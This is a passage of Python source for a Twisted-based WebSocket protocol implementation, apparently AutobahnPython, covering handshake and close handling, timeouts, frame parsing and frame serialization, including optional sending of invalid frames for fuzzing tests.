self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (sent by peer); when present, a status code MUST also have been present.
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reasonRaw: None or close reason (when present, a status code MUST also have been present).
:type reason: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
## cancel any closing HS timer if present
##
if self.closeHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("closeHandshakeTimeoutCall.cancel")
self.closeHandshakeTimeoutCall.cancel()
self.closeHandshakeTimeoutCall = None
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
if self.serverConnectionDropTimeout > 0:
self.serverConnectionDropTimeoutCall = reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
## reasonRaw already holds the UTF-8 encoded close reason received from the peer
self.sendCloseFrame(code = code, reasonUtf8 = reasonRaw, isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_PROXY_CONNECTING, STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.serverConnectionDropTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
We expected the peer to complete the opening handshake with us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.openHandshakeTimeoutCall = None
if self.state in [WebSocketProtocol.STATE_CONNECTING, WebSocketProtocol.STATE_PROXY_CONNECTING]:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.closeHandshakeTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSocket connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSocket closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSocket protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text messages when the payload is invalid UTF-8, or for close frames
with a close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def setTrackTimings(self, enable):
"""
Enable/disable tracking of detailed timings.
:param enable: Turn time tracking on/off.
:type enable: bool
"""
if not hasattr(self, 'trackTimings') or self.trackTimings != enable:
self.trackTimings = enable
if self.trackTimings:
self.trackedTimings = Timings()
else:
self.trackedTimings = None
def doTrack(self, msg):
if not hasattr(self, 'trackTimings') or not self.trackTimings:
return
self.trackedTimings.track(msg)
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
## copy default options from factory (so we are not affected by changed on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.setTrackTimings(self.factory.trackTimings)
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
if not self.isServer and self.factory.proxy is not None:
self.state = WebSocketProtocol.STATE_PROXY_CONNECTING
else:
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSocket closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# timers, which might get set up later, and remembered here to get canceled
# when appropriate
if not self.isServer:
self.serverConnectionDropTimeoutCall = None
self.openHandshakeTimeoutCall = None
self.closeHandshakeTimeoutCall = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
self.openHandshakeTimeoutCall = reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
## cancel any server connection drop timer if present
##
if not self.isServer and self.serverConnectionDropTimeoutCall is not None:
if self.debugCodePaths:
log.msg("serverConnectionDropTimeoutCall.cancel")
self.serverConnectionDropTimeoutCall.cancel()
self.serverConnectionDropTimeoutCall = None
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## need to establish proxy connection
##
elif self.state == WebSocketProtocol.STATE_PROXY_CONNECTING:
self.processProxyConnect()
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processProxyConnect(self):
"""
Process proxy connect.
Modes: Hybi, Hixie
"""
raise Exception("must implement proxy connect (client or server) in derived class")
def processHandshake(self):
"""
Process WebSocket handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol._QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows giving a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSocket data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
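## Illustrative usage sketch (not part of the library): writing hypothetical
## raw octets to the wire in 4-octet chunks, with a reactor reentry between chunks:
##
##   self.sendData(octets, chopsize = 4)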
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
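## Illustrative usage sketch (not part of the library): preparing a message once
## on the factory and sending it over many connections without re-framing; the
## connection registry self.factory.clients is a hypothetical application attribute:
##
##   msg = self.factory.prepareMessage("tick")
##   for proto in self.factory.clients:
##      proto.sendPreparedMessage(msg)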
def processData(self):
"""
After WebSocket handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame(None, None)
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
## need a minimum of 2 octets for a new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
self.current_frame_masker = createXorMasker(frame_mask, frame_payload_len)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
## reprocess when frame has no payload or there is buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows sending invalid frames (that is, frames invalid
per se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
It'll wrap within payload, resending parts of that when more octets were requested.
The use case is again for fuzzing servers which want to send increasing amounts
of payload data to peers without having to construct potentially large messages
themselves.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
masker = createXorMasker(mask, l)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
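## Illustrative worked example (not part of the library): with the encoding above,
## an unmasked, final text frame carrying the 2-octet payload "Hi" is serialized
## as b0 = 0x81 (FIN set, opcode 1) and b1 = 0x02 (mask bit clear, payload
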